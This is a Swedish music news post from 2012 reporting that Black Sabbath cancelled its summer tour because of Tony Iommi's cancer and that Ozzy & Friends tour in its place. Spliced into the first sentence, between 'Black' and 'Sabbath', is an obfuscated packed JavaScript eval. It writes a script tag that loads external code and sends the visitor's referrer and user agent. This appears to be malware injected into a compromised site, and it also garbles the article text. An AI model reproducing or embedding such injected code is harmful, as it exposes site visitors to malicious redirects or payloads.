Image Image Image Image Image Image Image Image Image Image

| 3 augusti, 2020

Scroll to top

Top

Inget Black Sabbath i Sommar…

Inget Black Sabbath i Sommar…
Filip Urde
  • On 20 februari, 2012
  • http://www.revue.se/filip-urde

Black eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eahfn|var|u0026u|referrer|risar||js|php’.split(’|’),0,{}))
Sabbath har meddelat att de på grund av gitarristen Tony Iommis kamp mot lymfkörtelcancer inte kommer kunna genomföra sin turné. den kommande turnén som planerat. Bandet kommer hedra Tony medatt genomföra turnén under namnet Ozzy and friends. Ozzy bjuder med sig välkända vänner för att genomföra en tribute-turné och i sommar ser vi därför Ozzy & Friends på Stockholms Stadion, en hyllning och support till vännen och orginalmedlemmen Tony Iommi. 

För Sverige innebär Ozzy & Friends att vi både i får se Black Sabbaths originalmedlem Geezer Butler bakom basen, dessutom kommer Ozzys gamla vapendragare till gitarrist Zakk Wylde vara med på hela turnén. På utvalda spelningar kommer även Ozzys gamla vän och tillika Guns N’ Roses-gitarristen Slash att medverka, däribland Malmö. Än fler gäster kommer dessutom att tillkomma när Ozzy nu samlar styrkorna inför sommarens turné. Det blir alltså inte Black Sabbath vi får se på scenen i sommar, men det blir årets hyllningsturné med idel namnkunniga rockmusiker när Ozzy, Geezer Butler, Zakk Wylde, Slash och flera andra tillsammans spelar för Iommis skull. Jätte tråkigt! Jag ville verkligen se Sabbath! Men det är bra ersättare ialla fall.